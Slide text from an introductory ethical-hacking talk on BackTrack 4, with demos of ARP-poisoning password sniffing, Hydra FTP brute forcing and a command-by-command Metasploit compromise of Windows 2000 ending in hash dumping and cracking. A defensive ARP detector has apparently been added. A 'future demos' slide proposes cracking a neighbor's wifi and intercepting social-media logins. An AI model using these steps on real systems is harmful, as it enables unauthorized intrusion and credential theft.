2. Who Am I?
● Attended UCSB 2004-2008
– Majored in Math and Philosophy, not CS
● Started using Linux in 2001
– Mandrake, then Slackware, then Debian
● Applying for penetration testing job in January
● Biases/“Preferences”
– Linux > Windoze (duh)
– Python > Ruby
– Emacs > vi
– Debian (and variants) > others
3. Can Hacking Be Ethical?
Or, what is Ethical Hacking?
● Black Hat
– Compromises computer systems without permission
– Criminal
● White Hat, aka Ethical Hacker
– Gets paid to hack – legally (friggin' sweet)
– Always gets permission before attacking a system
● Gray Hat
– Some combination of Black and White
4. The Stages of Hackerdom
● Script Kiddie (“skiddie”)
– Can only run automated tools
– Doesn't understand underlying technology
● Advanced Beginner
– Mastered advanced features of many tools
– Knows enough programming to create own tools
● C => Python, Ruby (see next slide)
● Uberhacker
– Discovers new vulnerabilities (or new types of vulns)
– Knows Assembly, C, Python and/or Ruby, SQL
– Excellent programmer; writes tools, scripts regularly
– Can defend as well as attack (firewalls, IDS, etc.)
9. Back|Track 4 Categories
● Information Gathering
– Email addresses, DNS
● Network Mapping
● Vulnerability Identification
● Web Application Analysis
● Radio Network Analysis
● Penetration (not that kind)
10. Back|Track 4 Categories
● Privilege Escalation
● Maintaining Access
● Digital Forensics
● Reverse Engineering
● VoIP (Voice over Internet Protocol)
● Misc
11. DEMO: Sniffing Passwords with Ettercap
● ARP Poisoning for MitM Attack
– Associate attacker's MAC with router's IP
– Target tries to route traffic through router
● Routes it through attacker instead
– Attacker forwards traffic both ways
– Attacker can silently watch or inject traffic
● TheMiddler, sslstrip
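A defender-side counterpart to the ARP poisoning described above, added here as an example and not part of the original slides: a minimal ARP-cache conflict detector run over constructed ARP reply records, which flags the moment a second MAC starts claiming the gateway's IP and counts how often the binding flips (the constructed IPs and MACs are sample values only).

```python
"""Detect ARP poisoning by watching for one IP claimed by two different MACs.

Added example, not from the original slides. The records below are
constructed to mimic what a passive sniffer would hand back for ARP
"is-at" replies: (timestamp_seconds, sender_ip, sender_mac).
"""
from collections import defaultdict

# Constructed sample: the real router answers for 192.168.1.1 with aa:..:01;
# at t=30 a second MAC (cc:..:99) starts claiming the same IP and keeps
# re-sending, which is what a poisoner must do to keep the cache overwritten.
SAMPLE_ARP_REPLIES = [
    (0, "192.168.1.1", "aa:aa:aa:aa:aa:01"),
    (5, "192.168.1.20", "bb:bb:bb:bb:bb:20"),
    (10, "192.168.1.1", "aa:aa:aa:aa:aa:01"),
    (30, "192.168.1.1", "cc:cc:cc:cc:cc:99"),
    (31, "192.168.1.1", "aa:aa:aa:aa:aa:01"),
    (32, "192.168.1.1", "cc:cc:cc:cc:cc:99"),
]


def detect_arp_conflicts(replies, known=None):
    """Return alerts as (timestamp, ip, first_seen_mac, conflicting_mac).

    `known` optionally seeds a trusted IP->MAC table (e.g. the real gateway),
    so a spoofed reply is flagged even if it is the first one observed.
    The first-seen/trusted binding is kept; a newcomer never overwrites it.
    """
    table = dict(known or {})
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        prev = table.get(ip)
        if prev is None:
            table[ip] = mac
        elif prev != mac:
            alerts.append((ts, ip, prev, mac))
    return alerts


def flapping_ips(alerts, threshold=2):
    """IPs whose binding conflicted at least `threshold` times, sorted."""
    counts = defaultdict(int)
    for _, ip, _, _ in alerts:
        counts[ip] += 1
    return sorted(ip for ip, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    found = detect_arp_conflicts(SAMPLE_ARP_REPLIES)
    for ts, ip, old, new in found:
        print(f"t={ts}s ALERT {ip} was {old}, now claimed by {new}")
    print("flapping:", flapping_ips(found))
```

Static ARP entries for the gateway or a switch with dynamic ARP inspection stop the overwrite itself; this detector only tells you it is being attempted.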
12. How Else Can We Get Creds?
● Phishing
– Via email
● Spear Phishing
– Becoming popular
– Very hard to stop
● In-person Social Engineering
– Kevin Mitnick is famous for this
● Brute force
13. DEMO: Bruteforcing FTP
● Using Hydra to bruteforce weak FTP password
– Well, really a dictionary attack
14. DEMO: Pwning Win2k
● Create database (or connect to existing)
– db_create [optional_database_name]
● Find win2k box using nmap (in metasploit)
– db_nmap -sV -p 135,139,445 xxx.xxx.xxx.0/24
● Search Metasploit for win2k exploits
– search 2000
● Use exploit w/meterpreter
– use exploit/windows/smb/ms05_039_pnp
– set PAYLOAD windows/meterpreter/bind_tcp
● Which parameters still need to be set?
– show options
15. DEMO: Pwning Win2k
● Set parameters
– set RHOST [target_ip]
● Now we exploit! Can you guess the command?
– exploit
● Get hashes
– hashdump
– This would be much harder without meterpreter!
● Copy and paste hashes into new text file
● Crack hashes with john the ripper
– ./john [file_containing_hashes].txt
● Game Over
16. Why Become an Ethical Hacker?
● Field is growing (see next slide)
– New laws, regulations
– US government falling behind in cyber security
● You get paid to hack – need I say more?
– Banks
– Telecoms
– Casinos
– Foreign countries (for the federal gov't)
17.
18. How Can I Practice Legally?
● Virtualization (VMware, VirtualBox)
– Use virtual images from recent CTF competitions
● http://lampsecurity.org/capture-the-flag-6
● http://ctf.hcesperer.org/25c3ctf
● http://ctf.hcesperer.org/daopen08
● http://ctf.hcesperer.org/eh08ctf
● NetWars
– Part of government's Cyber Defense Initiative 2009
● DVL: Damn Vulnerable Linux
– Purposely misconfigured, exploitable
– http://tinyurl.com/dvllinux15
20. Tools Added to Back|Track
Extra Tools I Used
● Metasploit 3.3.2 (updated)
● Nmap 5.0 (updated)
● Exploitdb archive (/pentest/exploits/exploitdb)
21. Summary
● Hacking can be ethical
● “Computer security” is an oxymoron
– No one is safe
● REALLY powerful hacking tools exist
● Metasploit is effing dangerous
22. Future Demos?
● More local fun
– Crack neighbor's wifi (WEP)
– Exploit remote vuln in DD-WRT firmware
– Redirecting traffic using fake DNS server
– Intercepting Twitter, Facebook, LinkedIn creds
● More like real pen testing
– SQL injection
– XSS
– Nessus scan
23. Contact Information
● Name: Steve Phillips
● New Blog: SweetHack.blogspot.com
● Email: fraktil@gmail.com
● Twitter: twitter.com/fraktil
● LinkedIn: linkedin.com/in/sdphillips
● IRC: fraktil in #sblug on borg-cube.com